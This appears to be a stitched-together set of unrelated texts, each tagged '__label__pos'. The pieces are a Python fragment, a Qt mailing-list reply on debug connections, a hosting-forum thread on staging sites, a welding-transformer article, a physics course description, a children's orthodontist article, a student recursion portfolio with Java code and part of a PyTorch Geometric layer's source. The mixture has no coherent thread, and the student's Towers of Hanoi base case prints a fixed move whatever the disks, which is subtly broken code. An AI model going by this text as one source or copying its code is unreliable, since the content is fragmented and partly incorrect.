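    fuel_trim = update_fuel_trim(reading, fuel_trim)
    print(f"lambda={reading:.2f}  fuel_trim={fuel_trim:+.4f}")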
__label__pos
0.993302
[Development] new "debugsupport" module and API Ulf Hermann ulf.hermann at digia.com Mon May 12 12:33:28 CEST 2014 > I guess using a TCP connection would still be possible, but not be the default anymore for local debugging/profiling? The QDebugServer so far supports four kinds of connections, and it's possible to add more. You can use local or TCP connections, and both allow you to establish them in either direction. E.g. the QDebugClient can open a QDebug{Local|Tcp}ServerConnection and the QDebugServer can connect to that using the respective client connection. The QQmlDebugServer (which wraps a QDebugServer) parses an additional command line argument "name" and will use a QDebugLocalServerConnection if it's found. QtCreator doesn't support that yet, but it would be easy to add. So, currently the default is still TCP and we can't really change that for applications using older versions of Qt. However, we can make QtCreator detect whether the application supports local connections and use them where possible. regards, Ulf
__label__pos
0.682869
Any tips for pushing changes from a staging site to a live site? #1 I've read the documentation, where they suggest just cloning the app, but I'm not clear on what this does to IP addresses and SSL certificates. How do other people handle this? Does Cloudways have any improved tools for this in the works? #2 Hi @paul.raphaelson I would suggest having a look at the comments section on the WordPress staging post. #3 I am not tech savvy; I don't use Git for version control or anything like that. What I do is clone websites that require major changes to a different application on the same server. Once the changes are done on the dev site, I import the latest data from the live site to the dev site and then point the domain to the dev site. After that I apply SSL and configure contact forms. I know that is a lot more work, but that is how I approach it. I usually keep the old website copy as a backup and mark it with a date. #4 Hi Talon, I am about to do the same and follow your steps in swapping live with staging. What do you mean by importing the latest data? How do you do that? Do you just assign the domain of the live site to the staging site? Since the IP is the same, will the domain name now point to the new application?
__label__pos
0.983729
Principle of operation of welding transformers How do welding transformers work? Welding transformers are used for contact (resistance) and arc electric welding. A short circuit of the secondary winding is the normal operating mode in contact welding (when the electrodes touch), and it often occurs during arc welding as well. Scheme of the device of the welding transformer. To limit short-circuit currents, welding transformers are built with a large inductive reactance and a rather low power factor. The inductive reactance of the welding transformer's circuit can be increased either by a special winding design or by connecting an additional inductance into the secondary (or primary) circuit. Within the transformer itself, higher inductive resistance of the windings is achieved by increasing the leakage flux, for example by placing the windings on different legs of the magnetic core, or at different heights on the same leg. Figure 1. Schemes of the device and principle of operation of welding transformers. Adding magnetic shunts to the magnetic core (Fig. 1a) also sharply increases the leakage flux and hence the inductive reactance of the windings. Transformers for contact welding are built with a secondary winding consisting of a single turn, whose voltage usually does not exceed 14 V. To regulate the current flowing through the welded part, the primary winding of the welding transformer has several taps; switching between them changes the number of turns in the winding. Nowadays the most widely used welding transformers are those intended for arc electric welding. Such transformers are built for a secondary voltage of 60-70 V (the arc ignition voltage). A feature of the operation of these transformers is the intermittent duty cycle, with abrupt transitions from no-load operation to short circuit and back. Small variations of current and a considerable inductance in the welding circuit are necessary for stable, continuous burning of the arc. To regulate the current in the welding circuit, an inductive coil (choke) with a steel magnetic core is connected in series with the secondary winding of the transformer (Fig. 1b). The magnitude of the welding current depends on the diameter of the electrode and is regulated by the reactance of the inductive coil, which depends on the size of the air gap A. Increasing the air gap in the magnetic core of the inductive coil reduces its reactance, so the current in the welding circuit rises. Sometimes the inductive coil and the welding transformer are combined into a single unit.
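As a rough guide to why the air gap controls the current — a simplified relation that neglects winding resistance, magnetic saturation and the arc voltage — the welding current is limited mainly by the reactance of the series choke: I_weld ≈ U2 / X_L, where X_L = 2·π·f·L and the choke inductance L = N² / (R_core + R_gap), with the gap reluctance R_gap = δ / (μ0·A), δ being the gap length and A its cross-section. Widening the gap δ raises R_gap, which lowers L and X_L and therefore raises the welding current; narrowing the gap has the opposite effect.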
__label__pos
0.798949
Condensed Matter Experiments Course content This course provides an introduction to selected techniques used in experimental condensed matter physics. The intention is to prepare the student for graduate level course work and experimental research in the fields of low-temperature solid state physics, semiconducting quantum devices, neutron scattering and X-ray diffraction. The students will learn key concepts that are essential in these fields and, more generally, have advanced their understanding of materials anywhere from quantum engineering over advanced functional materials to biophysics and chemistry.   Topics: Operating principles of a modern cryostat, cooling methods, heat transfer at cryogenic temperatures, and the physics of thermometry. Basic concepts of current flow at low temperatures, and resistance of metals and semiconductors. Brief introduction to the fabrication of crystals, heterostructures, and nanostructures. Methods of measuring accurately electrical and magnetic properties of a sample, including conductance and noise. Introduction to scattering methods, using light, X-ray and neutron beams. Concepts of interaction between matter and radiation, and its description by scattering functions. Introduction to methods of small angle scattering, diffraction and spectroscopy.   The course will be a combination of lectures, exercises, discussions of new experimental breakthroughs from literature, and a small number of laboratory experiments. The student is expected to actively take part in all activities, and gain a background for pursuing experimental work in local groups dedicated to the physics of quantum devices, X-ray and neutron scattering. Education MSc Programme in Physics MSc Programme in Physics w. minor subject Learning outcome Skills: After the course the student is expected to have the following skills: • Describe the properties of gaseous and liquid helium and nitrogen, and differentiate between 3He and 4He at low temperatures. • Identify the main components of a cryostat, and explain physical properties of solids that are relevant for the conduction and isolation of heat. • Explain the temperature dependence of electron-phonon coupling, and its implications for achieving low electron temperatures in quantum devices. • Describe different ways of measuring cryogenic electron and phonon temperatures. • Explain resistivity, resistance, conductivity, conductance, magnetic susceptibility. • Explain the concept of a semiconducting heterostructure, and the role of doping. • Explain two- and four-terminal measurements, lock-in detection, and basic concepts of electrical noise. • Explain principles of amplifiers, shielding, and the identification and elimination of extrinsic noise sources. • Explain the concept of coherence, and how it relates to particles and waves. Explain typical scales for coherence time and coherence lengths of solid state electrons, X-rays and neutrons. • Explain fundamental optical properties of X-ray and neutron radiation and its interaction with solids. • Establish formulas for the scattering function, and standard steps in the analysis of scattering data. • Work in small teams and efficiently perform an experiment, analyze the data and find a convincing interpretation. Communicate the results in a written document that places the findings into the context of what was known or expected before the experiment, and how they inform other experiments or raise important questions. 
Knowledge: After the course the student will be familiar with physical concepts that address the behavior of solids at low temperature, the flow of heat and electrical carriers, and the propagation of X-rays and neutrons. The student will know how interactions can be described by elastic and inelastic scattering, and the important role of coherence and interference. Most importantly, the student will understand how these theoretical concepts connect to key experimental methods used in the daily life of experimental groups dedicated to solid state quantum devices, neutron scattering and X-ray diffraction. Discussions of hot-off-the-press experimental literature and/or hands-on experiments in the course laboratory will prepare the young scientist for a smooth transition into an experimental research group. Competences: This course will provide the students with a background for further studies specializing in the physics and applications of quantum devices, X-ray and neutron scattering. The students will gain insight into the real-life execution of scientific experiments and the teamwork and software tools necessary to analyze and report results, in preparation for pursuing for example an experimental M.Sc. project. Teaching and learning methods: Lectures, exercises, group work, selected scientific articles and/or hands-on experiments. Literature: will be announced in Absalon. Recommended prerequisites: familiarity with quantum mechanics, condensed matter physics, statistical physics. Credit: 7.5 ECTS. Type of assessment: Oral examination, 20 minutes (without time for preparation); covers content of the course and written reports. Aid: All aids allowed. Marking scale: 7-point grading scale. Censorship form: No external censorship; several internal examiners. Criteria for exam assessment: see learning outcome. Course type: Single subject courses (day). Workload (hours): Lectures 43.5, Exercises 48, Preparation 114, Exam 0.5; total 206. Language: English.
__label__pos
0.992029
encodings Converts between different character encodings. On UNIX, this uses the iconv library, on Windows the Windows API. Types EncodingConverter = object dest, src: CodePage EncodingError = object of ValueError exception that is raised for encoding errors Procs proc getCurrentEncoding(): string {...}{.raises: [], tags: [].} retrieves the current encoding. On Unix, "UTF-8" is always returned. proc open(destEncoding = "UTF-8"; srcEncoding = "CP1252"): EncodingConverter {...}{. raises: [OverflowError, EncodingError], tags: [].} opens a converter that can convert from srcEncoding to destEncoding. Raises EncodingError if it cannot fulfill the request. proc close(c: EncodingConverter) {...}{.raises: [], tags: [].} frees the resources the converter c holds. proc convert(c: EncodingConverter; s: string): string {...}{.raises: [OSError], tags: [].} converts s to the destEncoding that was given to the converter c. It is assumed that s is in srcEncoding. proc convert(s: string; destEncoding = "UTF-8"; srcEncoding = "CP1252"): string {...}{. raises: [OverflowError, EncodingError, OSError], tags: [].} converts s to destEncoding. It is assumed that s is in srcEncoding. This opens a converter, uses it and closes it again, and is thus more convenient but also likely less efficient than re-using a converter.
__label__pos
0.997449
SqlCommands: What to choose between SqlDataAdapter, ExecuteScalar and ExecuteNonQuery SqlCommand class can be used in various ways to access database data and it’s true story that many developers are somehow confused in which one to choose each time the want to execute queries in the SQL Server. In this post we will try to make this clear and show the best practices to access your database using one of the following commands: 1. SqlDataAdapter.Fill 2. ExecuteScalar 3. ExecuteNonQuery Let’s start. Create a simple Console Application project and open the Program.cs file. Make sure you add using statements for the following namespaces. These are all you need to execute queries using the SqlCommand class. using System.Data; using System.Data.SqlClient; Let us first create a Database with a simple table, so we can run our queries. Create a database named SchoolDB and add a simple table as follow: sqlcommands-01 Make sure not to mark the StudentID column as an Identity. SqlDataAdapter.Fill SqlDataAdapter class is used to retrieve a dataset from the database. That is when you want to get multiple results from your database you can make use of SqlDataAdapter.Fill(DataSet ds) function. In the select query you can have as many SELECT statements you want. If you do so, the first SELECT result set will fill the first DataSet’s table, the Second SELECT statement the second table and so on.. For the simplicity of this post, first we will add some records (students) to the Students table and then we will create a stored procedure to retrieve them. In the C# code, we’ ll use the SqlDataAdapter to fill a DataSet with all the Students in the SchoolDB. INSERT INTO dbo.Students (StudentID, StudentName, StudentAge) VALUES (1,'Chris S.',28) INSERT INTO dbo.Students (StudentID, StudentName, StudentAge) VALUES (2,'Catherin',23) INSERT INTO dbo.Students (StudentID, StudentName, StudentAge) VALUES (3,'Nick',30) INSERT INTO dbo.Students (StudentID, StudentName, StudentAge) VALUES (4,'Maria',40) CREATE PROCEDURE GetStudents AS BEGIN SELECT * FROM dbo.Students END Add a GetStudents function in the Program.cs file as follow and run in through the main method. Also, make sure you define your connection string that points to your SQL Server. const string sqlConnectionString = "Data Source=localhost;Initial Catalog=SchoolDB;Integrated Security=SSPI;"; // Retrieve multiple records using an SqlDataAdapter public static DataSet GetStudents() { DataSet dsStudents = new DataSet(); using (SqlConnection con = new SqlConnection(sqlConnectionString)) { SqlCommand cmd = new SqlCommand("GetStudents", con); cmd.CommandType = CommandType.StoredProcedure; SqlDataAdapter da = new SqlDataAdapter(cmd); try { da.Fill(dsStudents); dsStudents.Tables[0].TableName = "Students"; } catch (Exception) { return dsStudents; } } return dsStudents; } sqlcommands-02 ExecuteScalar ExecuteScalar function is the best option to figure out the result of your executed query in the database. Let me explain it a little further. What I meant is that you use the ExecuteScalar command when you don’t care to read or retrieve a result set from your dabase but you expect a code description of what actually happened. Let’s see it on action now. Create another stored procedure named AddStudent in order to add Student records in the respective table. This procedure though has some limitations. 1. You cannot add a record with ID that is already in the table (primary key) 2. You cannot add an invalid Student Age 3. 
The idea is to return a different result code for each scenario so that you can handle it on the server side. CREATE PROCEDURE [dbo].[AddStudent] @studentID int, @studentName nvarchar(50), @studentAge int AS BEGIN DECLARE @result int = 0; DECLARE @tempID int; SET @tempID = (SELECT StudentID FROM dbo.Students WHERE StudentID = @studentID) IF @tempID IS NOT NULL SET @result = -1 -- There is already a student with this ID ELSE IF @studentAge < 5 OR @studentAge > 120 SET @result = -2 -- Invalid Age number ELSE INSERT INTO dbo.Students VALUES (@studentID, @studentName, @studentAge) SELECT @result ResultCode END Add the AddStudent method into the Program.cs file as follows. // Add student using ExecuteScalar in order to get the result code public static int AddStudent(int id, string name, int age) { int resultCode; using (SqlConnection con = new SqlConnection(sqlConnectionString)) { SqlCommand cmd = new SqlCommand("AddStudent", con); cmd.CommandType = CommandType.StoredProcedure; cmd.Parameters.Add("@studentID", DbType.Int32).Value = id; cmd.Parameters.Add("@studentName", DbType.String).Value = name; cmd.Parameters.Add("@studentAge", DbType.Int32).Value = age; try { con.Open(); resultCode = (int)cmd.ExecuteScalar(); con.Close(); } catch (Exception) { return -10; // unknown error } } return resultCode; } In the main method: // ExecuteScalar int resultCode = AddStudent(1, "Chris", 28); // Should get -1 (there is already a record with this ID) int resultCode2 = AddStudent(5, "Smith", 130); // Should get -2 (invalid age number) int resultCode3 = AddStudent(5, "Jason", 21); // Should get 0 (success) ExecuteNonQuery This function is a very good choice when you want to know how many rows your query has affected. You can use it while inserting, updating or deleting records. For this example let's create a stored procedure to update a student's name based on its StudentID. CREATE PROCEDURE [dbo].[UpdateStudentsName] @studentID int, @studentNewName nvarchar(50) AS BEGIN UPDATE dbo.Students SET StudentName = @studentNewName WHERE StudentID = @studentID END In Program.cs add the UpdateStudent method and call it in the main method. public static int UpdateStudent(int id, string newName) { int rowsAffected; using (SqlConnection con = new SqlConnection(sqlConnectionString)) { SqlCommand cmd = new SqlCommand("UpdateStudentsName", con); cmd.CommandType = CommandType.StoredProcedure; cmd.Parameters.Add("@studentID", DbType.Int32).Value = id; cmd.Parameters.Add("@studentNewName", DbType.String).Value = newName; try { con.Open(); rowsAffected = cmd.ExecuteNonQuery(); con.Close(); } catch (Exception) { return 0; // unknown error } } return rowsAffected; } // ExecuteNonQuery int row1 = UpdateStudent(1, "Chris Sak."); // Should return 1 // Row found and updated int row2 = UpdateStudent(30, "Helen K."); // Should return 0 // Row not found Batch Queries using SqlTransaction To be honest, most of the time you will want to execute more complex queries than the above, but you get the main idea. One of the best practices when you want to execute multiple (batch) queries against your database is to encapsulate them in a single transaction. Let's see how easy it is to handle the result of each query and roll back the transaction in case you get unexpected results. In the following method we try to add 4 students to the table, but the 4th insert should fail and cause the transaction to roll back.
// Use SqlCommands in a Transaction public static bool ExecuteBatchQueries(string conStr) { bool transactionExecuted = false; List<Student> studentList = new List<Student>(); Student s1 = new Student { ID = 10, Name = "John", Age = 34 }; Student s2 = new Student { ID = 11, Name = "Helen", Age = 23 }; Student s3 = new Student { ID = 12, Name = "Mary", Age = 54 }; Student s4 = new Student { ID = 10, Name = "Christiano", Age = 31 }; studentList.Add(s1); studentList.Add(s2); studentList.Add(s3); studentList.Add(s4); using (var con = new SqlConnection(conStr)) { SqlTransaction trans = null; try { con.Open(); trans = con.BeginTransaction(); foreach (Student student in studentList) { SqlCommand cmd = new SqlCommand("AddStudent", con, trans); cmd.CommandType = CommandType.StoredProcedure; cmd.Parameters.Add("@studentID", DbType.Int32).Value = student.ID; cmd.Parameters.Add("@studentName", DbType.String).Value = student.Name; cmd.Parameters.Add("@studentAge", DbType.Int32).Value = student.Age; int resultCode = (int)cmd.ExecuteScalar(); if (resultCode != 0) { trans.Rollback(); return transactionExecuted; // false } } trans.Commit(); transactionExecuted = true; con.Close(); } catch (Exception) { if (trans != null) trans.Rollback(); return false; } return transactionExecuted; } } public class Student { public int ID { get; set; } public string Name { get; set; } public int Age { get; set; } } In the main: // Combinations in SqlTransaction: very helpful! if(ExecuteBatchQueries(sqlConnectionString)) { Console.WriteLine("Transaction completed"); } else { Console.WriteLine("Transaction failed to complete"); } That's it, we saw when and how to use the different functions the SqlCommand class offers. I hope you have enjoyed the post. Download the project we created and the database as well from here.
__label__pos
0.943315
Every other week, Lamar's brother Calvin goes to the orthodontist after school to have his braces checked. One day the dentist told Lamar's mom that Lamar should see an orthodontist, too. What's an orthodontist? Why does Lamar need to see one? And what will happen at the appointment? What's an Orthodontist? Just like baseball and gymnastics are types of sports, an orthodontist (say: or-thoh-DONtist) is a type of dentist. Using braces, retainers, and other devices, an orthodontist helps straighten a person's teeth and correct the way the jaws line up. Straight teeth and aligned jaws create nice smiles and help keep your teeth healthy. On top of that, when your jaws and teeth are well aligned, it's easier to chew food. Orthodontic care can even help prevent snoring! So why would you go to the orthodontist? Your dentist or one of your parents might recommend it because they see a problem with your teeth or jaws. Or a kid who doesn't like the way his or her teeth look might ask to see an orthodontist. Orthodontists treat kids for many problems, including having crowded or overlapping teeth or having problems with jaw growth and tooth development. These tooth and jaw problems may be caused by tooth decay, losing baby teeth too soon, accidents, or habits like thumb sucking. These problems also can be genetic or inherited, meaning that they run in a person's family. When Should a Kid Go to the Orthodontist? There's no set age for a kid to visit the orthodontist — some kids go when they're 6, some kids go when they're 10, and some go while they're teens. Even adults visit the orthodontist for treatment. Many orthodontists say a kid should see an orthodontist before age 7 so any problems can be spotted early. That doesn't mean a kid will get braces right away. But the orthodontist will know which problems exist and can choose the best time to start treatment. What Happens at the Orthodontist? When you make your first trip to the orthodontist, you'll visit an office that looks a lot like your dentist's office. You'll sit in a dentist chair and the orthodontic technician or assistant might take X-rays or computer pictures of your mouth and teeth. The X-rays and pictures show the orthodontist where the teeth are positioned and whether you have teeth that haven't come in yet. The technician or orthodontist also may make a mold (or impression) of your teeth by pressing a tray of gooey material into your top and bottom teeth. When the mold is removed, there will be a perfect impression of the shape and size of your teeth. A mold helps the orthodontist decide how to straighten your teeth. The orthodontist will examine your teeth, mouth, and jaws. He or she may ask you to open wide or bite your teeth together and might ask questions about whether you have problems chewing or swallowing or whether your jaws ever click or pop when you open your mouth. The orthodontist may tell you and your parent that your teeth and jaws are fine, or recommend that you begin treatment. What Do Braces Do? Braces correct how your teeth line up by putting steady pressure on the teeth, which eventually moves them into a straighter position. A retainer also applies pressure to your teeth, and it may be used to hold your teeth in a straight position after wearing braces. Sometimes the orthodontist may recommend that you have one or more teeth removed to create more space in your mouth. If you need to have teeth removed, the dentist or oral surgeon will give you medicine to keep you comfortable during the procedure. 
Once your braces are on, you'll visit the orthodontist every few weeks. It's important to remember that you still need to get regular dental checkups during this time to have your teeth cleaned and checked for cavities. On some visits, the orthodontist may simply check to make sure that your braces are in place as they should be. At other visits, the orthodontist may adjust wires on the braces to move the teeth into position. The orthodontist may show you how to wear rubber bands, which are stretched between two teeth and help to correct the way your teeth line up. Some kids also may need to wear other devices, such as headgear. You may have seen kids who have headgear, which gets its name from the fact that it's worn around the head. Headgear uses a horseshoe-shaped wire, which attaches to back teeth. It's designed to apply pressure that pushes the back teeth back, allowing more room for teeth in the front of the mouth. Headgear is usually just worn at night, not during the day. You can expect to feel a little uncomfortable sometimes when you wear braces or other orthodontic devices. Your mom or dad can give you a pain reliever if it hurts. And the orthodontist usually provides wax you can use to cover any sharp spots on the braces that are bothering you or are rubbing against the inside of your mouth or gums. How Long Will I Have to Go to the Orthodontist? Braces can be worn for different lengths of time, but most people wear them for 1 to 3 years. After the braces are removed, many kids need to wear a retainer for a while to keep their teeth in place. During this time, you'll still need to visit the orthodontist regularly. Every kid wears a retainer for a different length of time. But the good news is, by the time you're wearing a retainer, you'll be smiling a super smile!
__label__pos
0.687687
Instituto Tecnológico Superior de Coatzacoalcos — Ingeniería en Sistemas Computacionales (Computer Systems Engineering). Student name: Contreras (paternal surname) Rodríguez (maternal surname) Octavio (given name(s)). PORTFOLIO OF EVIDENCE — Data Structures. Control number: 14082078. Instructor's name: Blanquet (paternal surname) Escobar (maternal surname) Landy (given name(s)). Semester: Group: INDEX Introduction..... 3 GENERAL COURSE OBJECTIVE..... 4 Syllabus..... 5 Unit 2 Recursion..... 8 2.1 Definition..... 8 2.2 Recursive procedures..... 9 2.3 Examples of recursive cases..... 14 Conclusion..... 15 Bibliography..... 16 Introduction Recursion is a technique widely used in programming. It is usually applied to solve problems whose solution can be found by solving the same problem for a case of smaller size. Recursive methods can be used in any situation in which the solution can be expressed as a sequence of steps or transformations governed by a clearly defined set of rules. In a recursive algorithm we can distinguish two parts: the base, a trivial problem that can be solved without further computation, and the recursion, a formula that gives the solution of the problem in terms of a simpler problem of the same type. GENERAL COURSE OBJECTIVE: Identify, select and efficiently apply abstract data types and sorting and searching methods to optimize the performance of solutions to real-world problems. Syllabus: UNIT 1 Introduction to data structures. 1.1 Abstract data types (ADT). 1.2 Modularity. 1.3 Use of ADTs. 1.4 Static memory management. 1.5 Dynamic memory management. UNIT 2 Recursion 2.1 Definition 2.2 Recursive procedures 2.3 Examples of recursive cases UNIT 3 Linear structures 3.1 Lists 3.1.1 Basic operations on lists. 3.1.2 Types of lists. 3.1.3 Singly linked lists. 3.1.4 Doubly linked lists. 3.1.5 Circular lists. 3.1.6 Applications. 3.2 Stacks. 3.2.1 Representation in static and dynamic memory. 3.2.2 Basic operations on stacks. 3.2.3 Applications. 3.2.4 Infix and postfix notation. 3.2.5 Recursion with the help of stacks. 3.3 Queues. 3.3.1 Representation in static and dynamic memory. 3.3.2 Basic operations on queues. 3.3.3 Types of queues: simple queue, circular queue and double-ended queue. 3.3.4 Applications: priority queues. UNIT 4 Non-linear structures 4.1 Trees. 4.1.1 Concept of a tree. 4.1.2 Classification of trees. 4.1.3 Basic operations on binary trees. 4.1.4 Applications. 4.1.5 Balanced trees (AVL). 4.2 Graphs. 4.2.1 Graph terminology. 4.2.2 Basic operations on graphs. UNIT 5 Sorting methods 5.1 Internal sorting algorithms 5.1.1 Bubble sort. 5.1.2 Quicksort. 5.1.3 Shellsort.
5.1.4 Radix sort 5.2 External sorting algorithms 5.2.1 Merging 5.2.2 Direct merge 5.2.3 Natural merge UNIT 6 Searching methods 6.1 Sequential search 6.2 Binary search 6.3 Search by hash functions UNIT 7 Analysis of algorithms 7.1 Time complexity. 7.2 Space complexity. 7.3 Efficiency of algorithms. Unit 2 Recursion 2.1 Definition Recursion is a programming technique in which a method can call itself. Recursion is very interesting and an effective programming technique, because it can produce short and efficient algorithms. Something is recursive if it is defined in terms of itself (when its definition refers to itself). If the invocation of a subprogram (function or subroutine) occurs from within the subprogram itself, it is said to be a recursive subprogram. A recursive method is a method that, directly or indirectly, makes a call to itself. Recursion consists of the use of recursive methods. It can be used in any situation in which the solution can be expressed as a sequence of steps. 1.1 An example of recursion (figure). A recursive function is made up of: - Base case: a simple solution for a particular case (there can be more than one base case). It is an instance that can be solved without recursion. - Recursive case: a solution that involves using the same original function, with parameters that move closer to the base case. The steps followed by the recursive case are: - The procedure calls itself. - The problem is solved by treating the same problem, but of smaller size. - The way in which the size of the problem decreases ensures that the base case will eventually be reached. 2.2 Recursive procedures A recursive procedure is one that calls itself, except that it does not return a value. Each method (function or procedure) has certain rules, which are mentioned below: the recursive function must have certain arguments, called base values, for which it no longer refers to itself; in a recursive procedure, each time the function refers to itself it must be closer to the base values. Properties of recursive procedures: there must be a base criterion for the procedure to stop calling itself; each time the procedure calls itself, it must be closer to the base criterion. The three-question method This is used to verify whether the recursive functions within a program are correct; three questions must be answered. The base-case question: Is there a non-recursive exit from the procedure or function, and does the routine work correctly for this base case? The smaller-caller question: Does each call to the procedure or function refer to a smaller case of the original problem? The general-case question: Assuming the recursive calls work correctly, does the entire procedure or function work correctly? Writing recursive procedures and functions (steps to follow to write recursive programs). The following method can be used to write any recursive routine. First, obtain an exact specification of the problem to be solved. Next, determine the size of the complete problem to be solved; this size determines the values of the parameters in the initial call to the procedure or function. Then solve the base case, in which the problem can be expressed non-recursively; this ensures an affirmative answer to the base-case question.
Finally, solve the general case correctly in terms of a smaller case of the same problem, that is, an affirmative answer to questions 2 and 3 of the three-question method. An example of a recursive case is the Fibonacci sequence. It is the following infinite sequence of natural numbers: 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, ..., in which each term is the sum of the two preceding ones. This sequence can be represented in Java as follows, applying recursion. 1.2 Example of Fibonacci as a recursive case (Java code). Once executed, the code looks like this; in this program we need the Fibonacci number of a value set in the code. 1.3 Fibonacci executed in Java. The code is presented below: package fibonaccirecursivo; public class FibonacciRecursivo { public static void main(String[] args) { long num=5; System.out.println("Serie Fibonacci"); System.out.println("El Fibonacci es "+fibo(num)); } public static long fibo (long num){ if (num==0 || num==1){ return num; } else{ return fibo(num-1)+fibo(num-2); } } } Another example is the Towers of Hanoi. For the Towers of Hanoi we first present the algorithm describing how the procedure works. Input: three stacks of disks — source, auxiliary, destination — with the source stack ordered. Output: the destination stack. 1. If the source stack contains a single disk, then 1. move disk 1 from the source stack to the destination stack (insert it on top of the destination stack) 2. stop. 2. Otherwise 1. hanoi(n-1, source, destination, auxiliary) // move all the disks except the largest (n) to the auxiliary rod 3. move disk n to the destination // move the largest disk to the final rod 4. hanoi(n-1, auxiliary, source, destination) // move all the remaining disks, 1...n-1, on top of the largest disk (n) 5. stop. Now in Java. 1.4 Towers of Hanoi program in Java. Once the program is written, we proceed to execute it. 1.5 Execution of the Towers of Hanoi in Java. The program code: package hanoi; import java.util.*; public class Hanoi { public void Hanoi(int num, int inicio,int temp, int fin) { if(num == 1) { System.out.print("Moviendo de la torre 1,ala torre 3"); } else { Hanoi(num-1, inicio, fin,temp); System.out.println("Moviendose de la torre de inicio"+inicio+"ala torre final"+fin); Hanoi(num-1, temp,inicio,fin); } } } Main program: package hanoi; import java.util.Scanner; public class Principal extends Hanoi{ public static void main(String[] args) { int n=0; Scanner leer = new Scanner(System.in); Hanoi h = new Hanoi(); System.out.println("Ingrese el numero de aros"); n = leer.nextInt(); h.Hanoi(n, 1,2,3); } } 2.3 Examples of recursive cases Example: Factorial. Write a program that computes the factorial (!) of a non-negative integer. 1! = 1; 2! = 2 = 2*1; 3! = 6 = 3*2*1; 4! = 24 = 4*3*2*1; 5! = 120 = 5*4*3*2*1. Recursive solution. Here we can see the form the factorial takes: N! = 1 if N = 0 (base case); N! = N * (N-1)! if N > 0 (recursive case). A recursive line of reasoning has two parts: the base and the recursive construction rule. The base is not recursive and is both the starting point and the termination condition of the definition. How does the recursion work? If (n == 0) then f(n) = 1; else f(n) = n * f(n-1). Tracing f(4): f(4) = 4 * f(3) = 4 * 6 = 24; f(3) = 3 * f(2) = 3 * 2 = 6; f(2) = 2 * f(1) = 2 * 1 = 2; f(1) = 1 * f(0) = 1 * 1 = 1; f(0) = 1. Conclusion In this unit we learned in detail what recursion is and how to apply it in a Java program in order to execute it. Recursion is a programming technique in which a method can call itself. Recursion is very interesting and an effective programming technique, because it can produce short and efficient algorithms.
Bibliography https://es.wikipedia.org/wiki/Sucesi%C3%B3n_de_Fibonacci https://sites.google.com/site/estdatjiq/home/unidad-ii http://itpn.mx/recursosisc/3semestre/estructuradedatos/Unidad%20II.pdf https://es.wikipedia.org/wiki/Torres_de_Han%C3%B3i http://puntocomnoesunlenguaje.blogspot.mx/2012/04/torres-de-hanoi.html
__label__pos
0.593038
Aircraft-based observations of air-sea fluxes over Denmark Strait and the Irminger Sea during high wind speed conditions GN Petersen, IA Renfrew Research output: Contribution to journal › Article › peer-review 10 Citations (Scopus) 10 Downloads (Pure) Abstract The impact of targeted sonde observations on the 1-3 day forecasts for northern Europe is evaluated using the Met Office four-dimensional variational data assimilation scheme and a 24 km gridlength limited-area version of the Unified Model (MetUM). The targeted observations were carried out during February and March 2007 as part of the Greenland Flow Distortion Experiment, using a research aircraft based in Iceland. Sensitive area predictions using either total energy singular vectors or an ensemble transform Kalman filter were used to predict where additional observations should be made to reduce errors in the initial conditions of forecasts for northern Europe. Targeted sonde data was assimilated operationally into the MetUM. Hindcasts show that the impact of the sondes was mixed. Only two out of the five cases showed clear forecast improvement; the maximum forecast improvement seen over the verifying region was approximately 5% of the forecast error 24 hours into the forecast. These two cases are presented in more detail: in the first the improvement propagates into the verification region with a developing polar low; and in the second the improvement is associated with an upper-level trough. The impact of cycling targeted data in the background of the forecast (including the memory of previous targeted observations) is investigated. This is shown to cause a greater forecast impact, but does not necessarily lead to a greater forecast improvement. Finally, the robustness of the results is assessed using a small ensemble of forecasts. Original language: English Pages (from-to): 2030-2045 Number of pages: 16 Journal: Quarterly Journal of the Royal Meteorological Society Volume: 135 Issue number: 645 Publication status: Published - 2009
__label__pos
0.911349
Source code for torch_geometric.nn.conv.point_transformer_conv from typing import Callable, Optional, Tuple, Union from torch import Tensor from torch_sparse import SparseTensor, set_diag from torch_geometric.nn.conv import MessagePassing from torch_geometric.nn.dense.linear import Linear from torch_geometric.typing import Adj, OptTensor, PairTensor from torch_geometric.utils import add_self_loops, remove_self_loops, softmax from ..inits import reset [docs]class PointTransformerConv(MessagePassing): r"""The Point Transformer layer from the `"Point Transformer" <https://arxiv.org/abs/2012.09164>`_ paper .. math:: \mathbf{x}^{\prime}_i = \sum_{j \in \mathcal{N}(i) \cup \{ i \}} \alpha_{i,j} \left(\mathbf{W}_3 \mathbf{x}_j + \delta_{ij} \right), where the attention coefficients :math:`\alpha_{i,j}` and positional embedding :math:`\delta_{ij}` are computed as .. math:: \alpha_{i,j}= \textrm{softmax} \left( \gamma_\mathbf{\Theta} (\mathbf{W}_1 \mathbf{x}_i - \mathbf{W}_2 \mathbf{x}_j + \delta_{i,j}) \right) and .. math:: \delta_{i,j}= h_{\mathbf{\Theta}}(\mathbf{p}_i - \mathbf{p}_j), with :math:`\gamma_\mathbf{\Theta}` and :math:`h_\mathbf{\Theta}` denoting neural networks, *i.e.* MLPs, and :math:`\mathbf{P} \in \mathbb{R}^{N \times D}` defines the position of each point. Args: in_channels (int or tuple): Size of each input sample, or :obj:`-1` to derive the size from the first input(s) to the forward method. A tuple corresponds to the sizes of source and target dimensionalities. out_channels (int): Size of each output sample. pos_nn (torch.nn.Module, optional): A neural network :math:`h_\mathbf{\Theta}` which maps relative spatial coordinates :obj:`pos_j - pos_i` of shape :obj:`[-1, 3]` to shape :obj:`[-1, out_channels]`. Will default to a :class:`torch.nn.Linear` transformation if not further specified. (default: :obj:`None`) attn_nn (torch.nn.Module, optional): A neural network :math:`\gamma_\mathbf{\Theta}` which maps transformed node features of shape :obj:`[-1, out_channels]` to shape :obj:`[-1, out_channels]`. (default: :obj:`None`) add_self_loops (bool, optional) : If set to :obj:`False`, will not add self-loops to the input graph. (default: :obj:`True`) **kwargs (optional): Additional arguments of :class:`torch_geometric.nn.conv.MessagePassing`. 
